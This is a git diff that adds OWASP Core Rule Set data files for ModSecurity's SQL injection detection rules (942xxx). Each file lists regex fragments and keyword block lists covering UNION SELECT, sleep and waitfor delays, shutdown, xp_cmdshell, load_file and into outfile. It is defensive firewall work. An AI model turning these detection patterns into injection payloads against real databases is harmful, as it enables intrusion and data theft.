b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942200.data new file mode 100644 index 000000000..44eff5141 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942200.data @@ -0,0 +1,14 @@ +,.*?[)\da-f\"'`][\"'`][\"'`].*?[\"'`] +,.*?[)\da-f\"'`][\"'`](?:\r?\n)?\z +,.*?[)\da-f\"'`][\"'`][^\"'`]+ +\Wselect.+\W*?from +select\s*?\(\s*?space\s*?\( +create\s*?\(\s*?space\s*?\( +rename\s*?\(\s*?space\s*?\( +truncate\s*?\(\s*?space\s*?\( +load\s*?\(\s*?space\s*?\( +alter\s*?\(\s*?space\s*?\( +delete\s*?\(\s*?space\s*?\( +update\s*?\(\s*?space\s*?\( +insert\s*?\(\s*?space\s*?\( +desc\s*?\(\s*?space\s*?\( diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942210.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942210.data new file mode 100644 index 000000000..1dd373cb8 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942210.data @@ -0,0 +1,40 @@ +@.+=\s*?\(\s*?select +\d\s*?or\s*?\d+\s*?[\-+] +\d\s*?xor\s*?\d+\s*?[\-+] +\d\s*?div\s*?\d+\s*?[\-+] +\d\s*?like\s*?\d+\s*?[\-+] +\d\s*?between\s*?\d+\s*?[\-+] +\d\s*?and\s*?\d+\s*?[\-+] +\/\w+;?\s+having\W +\/\w+;?\s+and\W +\/\w+;?\s+or\W +\/\w+;?\s+xor\W +\/\w+;?\s+div\W +\/\w+;?\s+like\W +\/\w+;?\s+between\W +\/\w+;?\s+select\W +\d\s+group\s+by.+\( +;\s*?drop +#\s*?drop +--\s*?drop +;\s*?alter +#\s*?alter +--\s*?alter +;\s*?update\s*?\w{2,} +#\s*?update\s*?\w{2,} +--\s*?update\s*?\w{2,} +;\s*?insert\s*?\w{2,} +#\s*?insert\s*?\w{2,} +--\s*?insert\s*?\w{2,} +[^\w]SET\s*?@\w+ +and[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()] +nand[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()] +or[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()] +xor[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()] +xxor[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()] +div[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()] +like[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()] +between[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()] +not[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()] +\|\|[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()] +\&\&[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()] diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942240.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942240.data new file mode 100644 index 000000000..48d070148 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942240.data @@ -0,0 +1,5 @@ +alter\s*?\w+.*?character\s+set\s+\w+ +alter\s*?\w+.*?char\s+set\s+\w+ +[\"'`];*?\s*?waitfor\s+time\s+[\"'`] +[\"'`];*?\s*?waitfor\s+delay\s+[\"'`] +[\"'`];.*?:\s*?goto diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942260.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942260.data new file mode 100644 index 000000000..697ac400d --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942260.data @@ -0,0 +1,22 @@ +union\s*?\s*?[([]*?\s*?select\s+ +union\s*?all\s*?[([]*?\s*?select\s+ +union\s*?distinct\s*?[([]*?\s*?select\s+ +union\s*?[(!@]*?\s*?[([]*?\s*?select\s+ +\w\s+like\s+[\"'`] +like\s*?[\"'`]\% +[\"'`]\s*?like\W*?[\"'`\d] +[\"'`]\s*?and\s+[\s\w]+=\s*?\w+\s*?having\s+ +[\"'`]\s*?nand\s+[\s\w]+=\s*?\w+\s*?having\s+ +[\"'`]\s*?or\s+[\s\w]+=\s*?\w+\s*?having\s+ +[\"'`]\s*?xor\s+[\s\w]+=\s*?\w+\s*?having\s+ +[\"'`]\s*?xxor\s+[\s\w]+=\s*?\w+\s*?having\s+ +[\"'`]\s*?div\s+[\s\w]+=\s*?\w+\s*?having\s+ +[\"'`]\s*?like\s+[\s\w]+=\s*?\w+\s*?having\s+ +[\"'`]\s*?between\s+[\s\w]+=\s*?\w+\s*?having\s+ +[\"'`]\s*?not\s+[\s\w]+=\s*?\w+\s*?having\s+ +[\"'`]\s*?\|\|\s+[\s\w]+=\s*?\w+\s*?having\s+ +[\"'`]\s*?\&\&\s+[\s\w]+=\s*?\w+\s*?having\s+ +[\"'`]\s*?\*\s*?\w+\W+[\"'`] +[\"'`]\s*?[^?\w\s=.,;)(]++\s*?[(@\"'`]*?\s*?\w+\W+\w +select\s+?[\[\]()\s\w\.,\"'`-]+from\s+ +find_in_set\s*?\( diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942280.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942280.data new file mode 100644 index 000000000..5033a8200 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942280.data @@ -0,0 +1,7 @@ +select\s*?pg_sleep +waitfor\s*?delay\s?[\"'`]+\s?\d +;\s*?shutdown\s*?; +;\s*?shutdown\s*?-- +;\s*?shutdown\s*?# +;\s*?shutdown\s*?\/\* +;\s*?shutdown\s*?{ diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942300.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942300.data new file mode 100644 index 000000000..d35b538c9 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942300.data @@ -0,0 +1,18 @@ +\)\s*?when\s*?\d+\s*?then +[\"'`]\s*?# +[\"'`]\s*?-- +[\"'`]\s*?{ +\/\*!\s?\d+ +char\s*?\(\s*?\d +chr\s*?\(\s*?\d +and\s+\s*?\w+\( +nand\s+\s*?\w+\( +or\s+\s*?\w+\( +xor\s+\s*?\w+\( +xxor\s+\s*?\w+\( +div\s+\s*?\w+\( +like\s+\s*?\w+\( +between\s+\s*?\w+\( +not\s+\s*?\w+\( +\|\|\s+\s*?\w+\( +\&\&\s+\s*?\w+\( diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942310.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942310.data new file mode 100644 index 000000000..be535c05e --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942310.data @@ -0,0 +1,15 @@ +[\"'`]\s+and\s*?=\W +\(\s*?select\s*?\w+\s*?\( +\*\/from +\+\s*?\d+\s*?\+\s*?@ +\w[\"'`]\s*?(?:[-+=|@]+\s+?)+[\d(] +\w[\"'`]\s*?[-+=|@]+[\d(] +coalesce\s*?\( +@@\w+\s*?[^\w\s] +\W!+[\"'`]\w +[\"'`];\s*?if +[\"'`];\s*?while +[\"'`];\s*?begin +[\"'`][\s\d]+=\s*?\d +order\s+by\s+if\w*?\s*?\( +[\s(]+case\d*?\W.+[tw]hen[\s(] diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942320.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942320.data new file mode 100644 index 000000000..f0c6158c0 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942320.data @@ -0,0 +1,7 @@ +create\s+function\s*?\w+\s*?\(\s*?\)\s*?- +create\s+procedure\s*?\w+\s*?\(\s*?\)\s*?- +declare[^\w]+[@#]\s*?\w+ +exec\s*?\(\s*?@ +procedure\s+analyse\s*?\( +;\s*?declare\s+[\w-]+ +;\s*?open\s+[\w-]+ diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942330.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942330.data new file mode 100644 index 000000000..222ca2dd5 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942330.data @@ -0,0 +1,46 @@ +[\"'`]\s*?or\s*?[\"'`]?\d +[\"'`]\s*?xor\s*?[\"'`]?\d +[\"'`]\s*?div\s*?[\"'`]?\d +[\"'`]\s*?like\s*?[\"'`]?\d +[\"'`]\s*?between\s*?[\"'`]?\d +[\"'`]\s*?and\s*?[\"'`]?\d +\\\\x(?:23|27|3d) +^.?[\"'`]$ +^[\"'`\\\\]*?[\d\"'`]+\s*?and\s*?[\w\"'`][+&!@(),.-] +^[\"'`\\\\]*?[\d\"'`]+\s*?nand\s*?[\w\"'`][+&!@(),.-] +^[\"'`\\\\]*?[\d\"'`]+\s*?or\s*?[\w\"'`][+&!@(),.-] +^[\"'`\\\\]*?[\d\"'`]+\s*?xor\s*?[\w\"'`][+&!@(),.-] +^[\"'`\\\\]*?[\d\"'`]+\s*?xxor\s*?[\w\"'`][+&!@(),.-] +^[\"'`\\\\]*?[\d\"'`]+\s*?div\s*?[\w\"'`][+&!@(),.-] +^[\"'`\\\\]*?[\d\"'`]+\s*?like\s*?[\w\"'`][+&!@(),.-] +^[\"'`\\\\]*?[\d\"'`]+\s*?between\s*?[\w\"'`][+&!@(),.-] +^[\"'`\\\\]*?[\d\"'`]+\s*?not\s*?[\w\"'`][+&!@(),.-] +^[\"'`\\\\]*?[\d\"'`]+\s*?\|\|\s*?[\w\"'`][+&!@(),.-] +^[\"'`\\\\]*?[\d\"'`]+\s*?\&\&\s*?[\w\"'`][+&!@(),.-] +^[\"'`\\\\]*?[^\"'`]+[\"'`]\s*?and\s*?[\w\"'`][+&!@(),.-] +^[\"'`\\\\]*?[^\"'`]+[\"'`]\s*?nand\s*?[\w\"'`][+&!@(),.-] +^[\"'`\\\\]*?[^\"'`]+[\"'`]\s*?or\s*?[\w\"'`][+&!@(),.-] +^[\"'`\\\\]*?[^\"'`]+[\"'`]\s*?xor\s*?[\w\"'`][+&!@(),.-] +^[\"'`\\\\]*?[^\"'`]+[\"'`]\s*?xxor\s*?[\w\"'`][+&!@(),.-] +^[\"'`\\\\]*?[^\"'`]+[\"'`]\s*?div\s*?[\w\"'`][+&!@(),.-] +^[\"'`\\\\]*?[^\"'`]+[\"'`]\s*?like\s*?[\w\"'`][+&!@(),.-] +^[\"'`\\\\]*?[^\"'`]+[\"'`]\s*?between\s*?[\w\"'`][+&!@(),.-] +^[\"'`\\\\]*?[^\"'`]+[\"'`]\s*?not\s*?[\w\"'`][+&!@(),.-] +^[\"'`\\\\]*?[^\"'`]+[\"'`]\s*?\|\|\s*?[\w\"'`][+&!@(),.-] +^[\"'`\\\\]*?[^\"'`]+[\"'`]\s*?\&\&\s*?[\w\"'`][+&!@(),.-] +[^\w\s]\w+\s*?[|-]\s*?[\"'`]\s*?\w +@\w+\s+and\s*?[\"'`\d]+ +@\w+\s+or\s*?[\"'`\d]+ +@\w+\s+xor\s*?[\"'`\d]+ +@\w+\s+div\s*?[\"'`\d]+ +@\w+\s+like\s*?[\"'`\d]+ +@\w+\s+between\s*?[\"'`\d]+ +@[\w-]+\sand\s*?[^\w\s] +@[\w-]+\sor\s*?[^\w\s] +@[\w-]+\sxor\s*?[^\w\s] +@[\w-]+\sdiv\s*?[^\w\s] +@[\w-]+\slike\s*?[^\w\s] +@[\w-]+\sbetween\s*?[^\w\s] +[^\w\s:]\s*?\d\W+[^\w\s]\s*?[\"'`]. +\Winformation_schema +table_name\W diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942340.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942340.data new file mode 100644 index 000000000..0d9d9a6fb --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942340.data @@ -0,0 +1,17 @@ +in\s*?[(]+\s*?select +(?i:n?and|x?x?or|div|like|between|not|\|\||\&\&)\s+[\s\w+]+regexp\s*?\( +(?i:n?and|x?x?or|div|like|between|not|\|\||\&\&)\s+[\s\w+]+sounds\s+like\s*?[\"'`] +(?i:n?and|x?x?or|div|like|between|not|\|\||\&\&)\s+[\s\w+]+[=\d]+x +[\"'`]\s*?\d\s*?-- +[\"'`]\s*?\d\s*?# +[\"'`][\%&<>^=]+\d\s*?= +[\"'`][\%&<>^=]+\d\s*?or +[\"'`][\%&<>^=]+\d\s*?xor +[\"'`][\%&<>^=]+\d\s*?div +[\"'`][\%&<>^=]+\d\s*?like +[\"'`][\%&<>^=]+\d\s*?between +[\"'`][\%&<>^=]+\d\s*?and +[\"'`]\W+[\w+-]+\s*?=\s*?\d\W+[\"'`] +[\"'`]\s*?is\s*?\d.+[\"'`]?\w +[\"'`][|]?[\w-]{3,}[^\w\s.,]+[\"'`] +[\"'`]\s*?is\s*?[\d.]+\s*?\W.*?[\"'`] diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942350.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942350.data new file mode 100644 index 000000000..fb60a831f --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942350.data @@ -0,0 +1,11 @@ +create\s+function\s+.+\s+returns +;\s*?alter\b\s*?[\[(]?\w{2,} +;\s*?create\b\s*?[\[(]?\w{2,} +;\s*?delete\b\s*?[\[(]?\w{2,} +;\s*?desc\b\s*?[\[(]?\w{2,} +;\s*?insert\b\s*?[\[(]?\w{2,} +;\s*?load\b\s*?[\[(]?\w{2,} +;\s*?rename\b\s*?[\[(]?\w{2,} +;\s*?select\b\s*?[\[(]?\w{2,} +;\s*?truncate\b\s*?[\[(]?\w{2,} +;\s*?update\b\s*?[\[(]?\w{2,} diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942360.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942360.data new file mode 100644 index 000000000..177c18fdf --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942360.data @@ -0,0 +1,134 @@ +alter\s+char\s?[(]? +alter\s+group_concat\s?[(]? +alter\s+load_file\s?[(]? +create\s+char\s?[(]? +create\s+group_concat\s?[(]? +create\s+load_file\s?[(]? +delete\s+char\s?[(]? +delete\s+group_concat\s?[(]? +delete\s+load_file\s?[(]? +desc\s+char\s?[(]? +desc\s+group_concat\s?[(]? +desc\s+load_file\s?[(]? +insert\s+char\s?[(]? +insert\s+group_concat\s?[(]? +insert\s+load_file\s?[(]? +load\s+char\s?[(]? +load\s+group_concat\s?[(]? +load\s+load_file\s?[(]? +rename\s+char\s?[(]? +rename\s+group_concat\s?[(]? +rename\s+load_file\s?[(]? +select\s+char\s?[(]? +select\s+group_concat\s?[(]? +select\s+load_file\s?[(]? +truncate\s+char\s?[(]? +truncate\s+group_concat\s?[(]? +truncate\s+load_file\s?[(]? +update\s+char\s?[(]? +update\s+group_concat\s?[(]? +update\s+load_file\s?[(]? +end\s*?\); +[\s(]load_file\s*?\( +[\"'`]\s+regexp\W +[\d\W]\s+as\b\s*[\"'`\w]+\s*\bfrom +^[\W\d]+\s*?create\s+\w+ +^[\W\d]+\s*?delete\b +^[\W\d]+\s*?desc\b +^[\W\d]+\s*?insert\b +^[\W\d]+\s*?load\b +^[\W\d]+\s*?rename\b +^[\W\d]+\s*?select\b +^[\W\d]+\s*?truncate\b +^[\W\d]+\s*?update\b +^[\W\d]+\s*?alter\s*aggregate\b +^[\W\d]+\s*?alter\s*application\s*role\b +^[\W\d]+\s*?alter\s*assembly\b +^[\W\d]+\s*?alter\s*asymmetric\s*key\b +^[\W\d]+\s*?alter\s*audit\b +^[\W\d]+\s*?alter\s*authorization\b +^[\W\d]+\s*?alter\s*availability\s*group\b +^[\W\d]+\s*?alter\s*broker\s*priority\b +^[\W\d]+\s*?alter\s*bufferpool\b +^[\W\d]+\s*?alter\s*certificate\b +^[\W\d]+\s*?alter\s*cluster\b +^[\W\d]+\s*?alter\s*collation\b +^[\W\d]+\s*?alter\s*column\b +^[\W\d]+\s*?alter\s*conversion\b +^[\W\d]+\s*?alter\s*credential\b +^[\W\d]+\s*?alter\s*cryptographic\s*provider\b +^[\W\d]+\s*?alter\s*database\b +^[\W\d]+\s*?alter\s*default\b +^[\W\d]+\s*?alter\s*dimension\b +^[\W\d]+\s*?alter\s*diskgroup\b +^[\W\d]+\s*?alter\s*domain\b +^[\W\d]+\s*?alter\s*endpoint\b +^[\W\d]+\s*?alter\s*extension\b +^[\W\d]+\s*?alter\s*external\b +^[\W\d]+\s*?alter\s*event\b +^[\W\d]+\s*?alter\s*flashback\b +^[\W\d]+\s*?alter\s*foreign\b +^[\W\d]+\s*?alter\s*fulltext\b +^[\W\d]+\s*?alter\s*function\b +^[\W\d]+\s*?alter\s*hierarchy\b +^[\W\d]+\s*?alter\s*group\b +^[\W\d]+\s*?alter\s*histogram\b +^[\W\d]+\s*?alter\s*index\b +^[\W\d]+\s*?alter\s*indextype\b +^[\W\d]+\s*?alter\s*inmemory\b +^[\W\d]+\s*?alter\s*instance\b +^[\W\d]+\s*?alter\s*java\b +^[\W\d]+\s*?alter\s*language\b +^[\W\d]+\s*?alter\s*large\b +^[\W\d]+\s*?alter\s*library\b +^[\W\d]+\s*?alter\s*lockdown\b +^[\W\d]+\s*?alter\s*logfile\s*group\b +^[\W\d]+\s*?alter\s*login\b +^[\W\d]+\s*?alter\s*mask\b +^[\W\d]+\s*?alter\s*master\s*key\b +^[\W\d]+\s*?alter\s*materialized\b +^[\W\d]+\s*?alter\s*message\s*type\b +^[\W\d]+\s*?alter\s*method\b +^[\W\d]+\s*?alter\s*module\b +^[\W\d]+\s*?alter\s*nickname\b +^[\W\d]+\s*?alter\s*operator\b +^[\W\d]+\s*?alter\s*outline\b +^[\W\d]+\s*?alter\s*package\b +^[\W\d]+\s*?alter\s*partition\b +^[\W\d]+\s*?alter\s*permission\b +^[\W\d]+\s*?alter\s*procedure\b +^[\W\d]+\s*?alter\s*profile\b +^[\W\d]+\s*?alter\s*queue\b +^[\W\d]+\s*?alter\s*remote\b +^[\W\d]+\s*?alter\s*resource\b +^[\W\d]+\s*?alter\s*role\b +^[\W\d]+\s*?alter\s*rollback\b +^[\W\d]+\s*?alter\s*route\b +^[\W\d]+\s*?alter\s*schema\b +^[\W\d]+\s*?alter\s*search\b +^[\W\d]+\s*?alter\s*security\b +^[\W\d]+\s*?alter\s*server\b +^[\W\d]+\s*?alter\s*service\b +^[\W\d]+\s*?alter\s*sequence\b +^[\W\d]+\s*?alter\s*session\b +^[\W\d]+\s*?alter\s*symmetric\s*key\b +^[\W\d]+\s*?alter\s*synonym\b +^[\W\d]+\s*?alter\s*stogroup\b +^[\W\d]+\s*?alter\s*table\b +^[\W\d]+\s*?alter\s*tablespace\b +^[\W\d]+\s*?alter\s*text\b +^[\W\d]+\s*?alter\s*threshold\b +^[\W\d]+\s*?alter\s*trigger\b +^[\W\d]+\s*?alter\s*trusted\b +^[\W\d]+\s*?alter\s*type\b +^[\W\d]+\s*?alter\s*usage\b +^[\W\d]+\s*?alter\s*user\b +^[\W\d]+\s*?alter\s*view\b +^[\W\d]+\s*?alter\s*work\b +^[\W\d]+\s*?alter\s*workload\b +^[\W\d]+\s*?alter\s*wrapper\b +^[\W\d]+\s*?alter\s*xml\s*schema\b +^[\W\d]+\s*?alter\s*xsrobject\b +^[\W\d]+\s*?union\s*all\b +^[\W\d]+\s*?union\s*select\b +^[\W\d]+\s*?union\s*distinct\b diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942370.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942370.data new file mode 100644 index 000000000..7edf306c0 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942370.data @@ -0,0 +1,19 @@ +[\"'`]\s*?\*.+or\W*?[\"'`]\d +[\"'`]\s*?\*.+xor\W*?[\"'`]\d +[\"'`]\s*?\*.+div\W*?[\"'`]\d +[\"'`]\s*?\*.+like\W*?[\"'`]\d +[\"'`]\s*?\*.+between\W*?[\"'`]\d +[\"'`]\s*?\*.+and\W*?[\"'`]\d +[\"'`]\s*?\*.+id\W*?[\"'`]\d +\^[\"'`] +[\"'`]\s*?[^\w\s?]+\s*?[^\w\s]+\s*?[\"'`] +[\"'`]\s*?[^\w\s]+\s*?[\W\d].*?# +[\"'`]\s*?[^\w\s]+\s*?[\W\d].*?-- +[\"'`].*?\*\s*?\d +[\"'`]\s*?or\s[^\d]+[\w-]+.*?\d +[\"'`]\s*?xor\s[^\d]+[\w-]+.*?\d +[\"'`]\s*?div\s[^\d]+[\w-]+.*?\d +[\"'`]\s*?like\s[^\d]+[\w-]+.*?\d +[\"'`]\s*?between\s[^\d]+[\w-]+.*?\d +[\"'`]\s*?and\s[^\d]+[\w-]+.*?\d +[()\*<>%+-][\w-]+[^\w\s]+[\"'`][^,] diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942380.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942380.data new file mode 100644 index 000000000..da4a07cf4 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942380.data @@ -0,0 +1,19 @@ +\b(?i:having)\b\s+\d{1,10}\s*?[=<>] +\b(?i:having)\b\s+'[^=]{1,10}'\s*?[=<>] +(?i:\bexecute\() +(?i:\bexecute\s{1,5}[\w\.$]{1,5}\s{0,3}) +\bhaving\b ?\d{1,10} ?[=<>]+ +\bhaving\b ?[\'\"][^=]{1,10}[\'\" ?[=<>]+ +(?i:\bcreate\s+?table.{0,20}?\() +(?i:\blike\W*?char\W*?\() +(?i:select.*?case) +(?i:from.*?limit) +(?i:order\sby) +exists\s\sselect +exists\sselect\Sif\s\( +exists\sselect\Sifnull\s\( +exists\sselect\Stop +exists\sselect\Sconcat +exists\ssystem\s\( +exists\s\b(?i:having)\b\s+\d{1,10} +exists\s'[^=]{1,10}' diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942390.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942390.data new file mode 100644 index 000000000..4fff94b43 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942390.data @@ -0,0 +1,12 @@ +(?i:\bor\b ?\d{1,10} ?[=<>]+) +(?i:\bor\b ?[\'\"][^=]{1,10}[\'\"] ?[=<>]+) +(?i:'\s+or\s+.{1,20}[+\-!<>=]) +(?i:'\s+xor\s+.{1,20}[+\-!<>=]) +\b(?i:or)\b\s+\d{1,10} +\b(?i:or)\b\s+'[^=]{1,10}' +\b(?i:xor)\b\s+\d{1,10} +\b(?i:xor)\b\s+'[^=]{1,10}' +\b(?i:or)\b\s+\d{1,10}\s*?[=<>] +\b(?i:xor)\b\s+\d{1,10}\s*?[=<>] +\b(?i:or)\b\s+'[^=]{1,10}'\s*?[=<>] +\b(?i:xor)\b\s+'[^=]{1,10}'\s*?[=<>] diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942400.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942400.data new file mode 100644 index 000000000..45b39f171 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942400.data @@ -0,0 +1,6 @@ +\band\b\s+\d{1,10}\s*?[=<>] +\band\b\s+'[^=]{1,10}'\s*?[=<>] +\band\b\s+\d{1,10} +\band\b\s+'[^=]{1,10}' +\band\b ?\d{1,10} ?[=<>]+ +\band\b ?[\'\"][^=]{1,10}[\'\"] ?[=<>]+ diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942410.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942410.data new file mode 100644 index 000000000..62a5bb593 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942410.data @@ -0,0 +1,239 @@ +abs +acos +adddate +addtime +aes_decrypt +aes_encrypt +asin +ascii +asciistr +atan +atan2 +avg +benchmark +bin +bin_to_num +bit_and +bit_count +bit_length +bit_or +bit_xor +cast +char +character_length +char_length +charset +chr +ciel +cieling +coalesce +coercibility +compress +concat +concat_ws +connection_id +conv +convert +convert_tz +cos +cot +count +cr32 +curdate +current_date +current_time +current_timestamp +current_user +curtime +database +date +date_add +datediff +date_format +date_sub +day +dayname +dayofmonth +dayofweek +dayofyear +dcount +decode +default +degrees +des_decrypt +des_encrypt +dump +elt +encode +encrypt +exp +export_set +extract +extractvalue +field +field_in_set +find_in_set +floor +format +found_rows +from_base64 +from_days +from_unixtime +get_format +get_lock +greatest +group_concat +hex +hextoraw +hour +if +ifnull +in +inet6_aton +inet6_ntoa +inet_aton +inet_ntoa +insert +instr +interval +is +is_free_lock +is_ipv4 +is_ipv4_compat +is_ipv4_mapped +is_ipv6 +is_not +is_not_null +isnull +is_null +is_used_lock +last +last_day +last_insert_id +lcase +least +left +length +ln +load_file +local +localtimestamp +locate +log +log10 +log2 +lower +lpad +ltrim +makedate +make_set +master_pos_wait +max +md5 +microsecond +mid +min +minute +mod +month +monthname +name_const +not_in +now +nullif +oct +octet_length +old_password +ord +password +period_add +period_diff +pg_sleep +pi +position +pow +power +procedure_analyse +quarter +quote +radians +rand +rawtohex +rawtonhex +rawtonhextoraw +release_lock +repeat +replace +reverse +right +round +row_count +rpad +rtrim +schema +second +sec_to_time +session_user +sha +sha1 +sha2 +sign +sin +sleep +soundex +space +sqrt +std +stddev +stddev_pop +stddev_samp +strcmp +str_to_date +subdate +substr +substring +substring_index +subtime +sum +sysdate +system_user +tan +time +timediff +time_format +timestamp +timestampadd +timestampdiff +time_to_sec +to_base64 +to_char +to_days +to_nchar +to_seconds +trim +truncate +ucase +uncompress +uncompressed_length +unhex +unix_timestamp +updatexml +upper +user +utc_date +utc_time +utc_timestamp +uuid +uuid_short +values +variance +var_pop +var_samp +version +week +weekday +weekofyear +weight_string +xmltype +year +yearweek diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942470.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942470.data new file mode 100644 index 000000000..ad69d1adb --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942470.data @@ -0,0 +1,45 @@ +autonomous_transaction +dba_users +dbms_java +nvarchar +openowa_util +openquery +openrowset +sp_addextendedproc +sp_execute +sp_executesql +sp_help +sp_is_srvrolemember +sp_makewebtask +sp_oacreate +sp_password +sp_prepare +sp_replwritetovarbin +sp_sqlexec +sql_longvarchar +sql_variant +tbcreator +utl_file +utl_http +varchar +xp_availablemedia +xp_cmdshell +xp_dirtree +xp_enumdsn +xp_execresultset +xp_filelist +xp_loginconfig +xp_makecab +xp_ntsec +xp_ntsec_enumdomains +xp_regaddmultistring +xp_regdeletekey +xp_regdeletevalue +xp_regenumkeys +xp_regenumvalues +xp_regread +xp_regremovemultistring +xp_regwrite +xp_servicecontrol +xp_terminate +xp_terminate_process diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942480.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942480.data new file mode 100644 index 000000000..b34a23adc --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942480.data @@ -0,0 +1,29 @@ +\bdbms_\w+\.\b +\bdelete\b\W*?\bfrom\b +\bgroup\b.*?\bby\b.{1,100}?\bhaving\b +\binner\b\W*?\bjoin\b +\binsert\b\W*?\binto\b +\binto\b\W*?\bdumpfile\b +\binto\b\W*?\boutfile\b +\bload\b\W*?\bdata\b.*?\binfile\b +\bprint\b\W*?\@\@ +\bselect\b.{1,100}?\b.*?\bdump\b.*\bfrom\b +\bselect\b.{1,100}?\bcount\b.{1,100}?\bfrom\b +\bselect\b.{1,100}?\bdata_type\b +\bselect\b.{1,100}?\bfrom\b.{1,100}?\bwhere\b +\bselect\b.{1,100}?\binstr\b +\bselect\b.{1,100}?\blength\b.{1,100}?\bfrom\b +\bselect\b.{1,100}?\bto_char\b +\bselect\b.{1,100}?\bto_number\b +\bselect\b.{1,100}?\btop\b.{1,100}?\bfrom\b +\bsys_context\b +\bunion\b.{1,100}?\bselect\b +\butl_inaddr\b +collation\W*?\(a\b +'dbo' +'msdasql' +'sa' +'sqloledb' +\@\@version\b +;\W*?\bdrop\b +;\W*?\bshutdown\b diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-assemble-v2.pl b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-assemble-v2.pl new file mode 100755 index 000000000..cb0e67730 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-assemble-v2.pl @@ 